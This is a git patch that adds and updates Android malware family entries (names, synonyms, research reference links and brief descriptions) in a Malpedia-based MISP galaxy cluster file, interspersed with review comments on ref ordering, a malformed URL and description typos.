From f02ce7e8056262c92830520ef3b9fe783a20557d Mon Sep 17 00:00:00 2001
From: Jakob M
Date: Fri, 12 Mar 2021 10:35:12 +0100
Subject: [PATCH] update to latest Ref: https://malpedia.caad.fkie.fraunhofer.de/api/get/misp
---
 clusters/malpedia.json | 17759 ++++++++++++++++++++++++++++++++++++---
 1 file changed, 16380 insertions(+), 1379 deletions(-)
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 09c02f1..7974a14 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -6,8 +6,7 @@
 "Andrea Garavaglia",
 "Andras Iklody",
 "Daniel Plohmann",
- "Christophe Vandeplas",
- "Rmkml"
+ "Christophe Vandeplas"
 ],
 "category": "tool",
 "description": "Malware galaxy cluster based on Malpedia.",
@@ -21,9 +20,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
- "https://www.us-cert.gov/ncas/alerts/TA18-275A",
 "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
- "https://github.com/fboldewin/FastCashMalwareDissected/"
+ "https://github.com/fboldewin/FastCashMalwareDissected/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.youtube.com/watch?v=zGvQPtejX9w"
 ],
 "synonyms": [],
 "type": []
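Review bot: In the `@@ -21,9 +20,17 @@` hunk the TA18-275A reference is deleted and re-added further down the list, so the `refs` array is being rewritten in whatever order the upstream export returns rather than extended. This presumably comes from the generator named in the commit message; if the order carries no meaning, sorting `refs` before writing the file (or keeping existing entries in place and appending new ones) would reduce these updates to genuine additions and removals and make a 16k-line data diff reviewable. The same delete-and-re-add pattern shows up in the `apk.androrat`, `apk.chrysaor`, `apk.fakespy` and `apk.gustuff` hunks.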
@@ -31,6 +38,34 @@ "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", "value": "FastCash" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" + ], + "synonyms": [ + "AxeSpy" + ], + "type": [] + }, + "uuid": "5c7a35bf-e5f1-4b07-b93a-c3608cc9142e", + "value": "ActionSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot", + "https://twitter.com/LukasStefanko/status/1243198756981559296" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d95708e9-220a-428c-b126-a63986099892", + "value": "AdoBot" + }, { "description": "", "meta": { 
@@ -44,14 +79,46 @@ "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth", + "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://www.secrss.com/articles/24995", + "https://securelist.com/transparent-tribe-part-2/98233/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "86a5bb47-ac59-449a-8ff2-ae46e19cc6d2", + "value": "AhMyth" + }, + { + "description": "According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de483b10-4247-46b3-8ab5-77d089f0145c", + "value": "Alien" + }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. 
The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", - "https://github.com/DesignativeDave/androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://github.com/DesignativeDave/androrat", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], 
@@ -65,26 +132,38 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", + "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", - "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", - "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", - "https://pentest.blog/n-ways-to-unpack-mobile-malware/", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", - "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", - "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html" + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", + "https://www.youtube.com/watch?v=U0UsfO-0uJM", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securelist.com/mobile-malware-evolution-2019/96280/", + "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html", + 
"http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", + "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", + "https://community.riskiq.com/article/85b3db8c", + "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://pentest.blog/n-ways-to-unpack-mobile-malware/", + "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html" ], "synonyms": [ - "BankBot" + "BankBot", + "android.bankbot", + "android.bankspy" ], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "Anubis" + "value": "Anubis (Android)" }, { "description": "", @@ -105,7 +184,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", - "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] 
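Review bot: The new `refs` entry `"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ "` in the Anubis hunk carries a trailing space inside the string, which produces a malformed URL for any consumer that follows it; the entry should be `"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/"`, and since this file is generated, stripping surrounding whitespace from each ref on import would keep the next export from reintroducing it. Separately, the same hunk renames `"value": "Anubis"` to `"Anubis (Android)"` while keeping the uuid but does not add `Anubis` to `synonyms`, so anything that matches this cluster by name rather than by uuid (e.g. a tag of the form `misp-galaxy:malpedia="Anubis"`) will no longer resolve to it; carrying the former value as a synonym is the usual way to keep that compatible.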
@@ -113,12 +193,67 @@ "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas", + "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aabcfbb6-6385-486d-a30b-e3a2edcf493d", + "value": "Ashas" + }, + { + "description": "According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018.\r\nIT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank", + "https://twitter.com/LukasStefanko/status/1268070798293708800" + ], + "synonyms": [], + "type": [] + }, + "uuid": "231f9f49-6752-49af-9ee0-7774578fcbe4", + "value": "ATANK" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5eec00de-5d81-4907-817d-f99cb33d9b66", + "value": "BADCALL (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch", + "https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/" + ], + "synonyms": [ + "WelcomeChat" + ], + "type": [] + }, + "uuid": "9b96e274-1602-48a4-8e0d-9f756d4e835b", + "value": "BadPatch" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", 
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], @@ -128,11 +263,25 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke", + "https://twitter.com/LukasStefanko/status/1280243673100402690" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c59b65d6-d363-4b19-b082-d72508e782c0", + "value": "Basbanke" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", + "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], @@ -141,6 +290,33 @@ "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.blackrock", + "https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2f3f82f6-ec21-489e-8257-0967c567798a", + "value": "BlackRock" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata", + "https://securelist.com/spying-android-rat-from-brazil-brata/92775/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d9ff080d-cde0-48da-89db-53435c99446b", + "value": "BRATA" + }, { "description": "", "meta": { 
@@ -154,6 +330,19 @@ "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56090c0b-2b9b-4624-8eff-ef6d3632fd2b", + "value": "CarbonSteal" + }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { 
@@ -168,11 +357,38 @@ "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/", + "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/", + "https://community.riskiq.com/article/85b3db8c", + "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/", + "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", + "https://github.com/ics-iot-bootcamp/cerberus_research", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://twitter.com/AndroidCerberus" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3a2448f-bb41-4201-b524-3ddcb02ddbf4", + "value": "Cerberus" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", + "https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf", "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" ], 
@@ -202,11 +418,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf" ], "synonyms": [ "JigglyPuff", @@ -245,6 +463,19 @@ "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", "value": "Clipper" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cloudatlas", + "https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ed780667-b67c-4e17-ab43-db1b7e018e66", + "value": "CloudAtlas" + }, { "description": "", "meta": { 
@@ -273,6 +504,20 @@ "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, + { + "description": "Poses as an app that can offer a \"corona safety mask\" but phone's address book and sends sms to contacts, spreading its own download link.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm", + "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html", + "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f041032e-01af-4e66-9fb2-f8da88a6ea35", + "value": "Coronavirus Android Worm" + }, { "description": "", "meta": { 
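Review bot: The `description` added for `Coronavirus Android Worm` is missing its verb: `Poses as an app that can offer a "corona safety mask" but phone's address book and sends sms to contacts`. Read together with the two refs it presumably means `... but reads the phone's address book and sends SMS to contacts, spreading its own download link.`; because the text is imported from Malpedia, the correction belongs in the upstream entry so the next export does not overwrite it.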
@@ -286,6 +531,94 @@ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor", + "https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/" + ], + "synonyms": [ + "CryCrypter", + "CryDroid" + ], + "type": [] + }, + "uuid": "21e9d7e6-6e8c-49e4-8869-6bac249cda8a", + "value": "CryCryptor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades", + "https://twitter.com/LukasStefanko/status/1252163657036976129" + ], + "synonyms": [ + "Rogue" + ], + "type": [] + }, + "uuid": "97fe35c9-f50c-495f-8736-0ecd95c70192", + "value": "Dark Shades" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + ], + "synonyms": [ + "Defensor Digital" + ], + "type": [] + }, + "uuid": "76346e4d-d14e-467b-9409-82b28a4d6cd6", + "value": "DEFENSOR ID" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "synonyms": [], + "type": [] + }, + "uuid": "89989df2-e8bc-4074-a8a2-130a15d6625f", + "value": "Dendroid" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + 
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "72a25832-4bf4-4505-a77d-8c0fc52dc85d", + "value": "dmsSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "73fd1bda-e4aa-4777-a628-07580bc070f4", + "value": "DoubleAgent" + }, { "description": "", "meta": { @@ -299,6 +632,19 @@ "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack", + "https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8990cec7-ddd8-435e-97d6-5b36778e86fe", + "value": "DroidJack" + }, { "description": "", "meta": { @@ -317,6 +663,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], 
@@ -325,6 +672,21 @@ "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, + { + "description": "According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot", + "https://twitter.com/ThreatFabric/status/1240664876558823424", + "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "https://www.youtube.com/watch?v=qqwOrLR2rgU" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f", + "value": "Eventbot" + }, { "description": "", "meta": { @@ -345,6 +707,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" ], "synonyms": [], @@ -358,8 +721,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/" + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" ], "synonyms": [], "type": [] 
@@ -382,6 +746,36 @@ "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder", + "https://www.welivesecurity.com/2019/07/29/android-ransomware-back/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "09ff3520-b643-44bd-a0de-90c0e75ba12f", + "value": "FileCoder" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", + "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", + "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", + "https://github.com/linuzifer/FinSpy-Dokumentation", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bf7acd4-6493-4126-9598-d2ed069e32eb", + "value": "FinFisher (Android)" + }, { "description": "", "meta": { @@ -400,6 +794,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ 
@@ -410,6 +805,80 @@ "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, + { + "description": "PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for it's C&C.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", + "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", + "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef91833f-3334-4955-9218-f106494e9fc0", + "value": "FluBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot", + "https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bc0d37fa-113a-45ba-8a1c-b9d818e31f27", + "value": "FunkyBot" + }, + { + "description": "According to Check Point, they uncovered an operation dubbed \"Domestic Kitten\", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. 
This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball", + "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html", + "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", + "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program", + "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", + "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/", + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53282cc8-fefc-47d7-b6a5-a82a05a88f2a", + "value": "FurBall" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost", + "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/", + "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b9639878-733c-4f30-9a13-4680a7e17415", + "value": "Geost" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob", + "https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3d1f2591-05fe-42f4-aaf8-ed1428f17605", + "value": "Ghimob" + }, { "description": "", "meta": { 
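Review bot: The FluBot `description` added in this hunk reads `It uses a DGA for it's C&C.`, where the possessive should be `its C&C`. The text is copied from the Malpedia export, so fixing it upstream avoids the change being reverted at the next update; the hunk itself starts on the previous page line.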
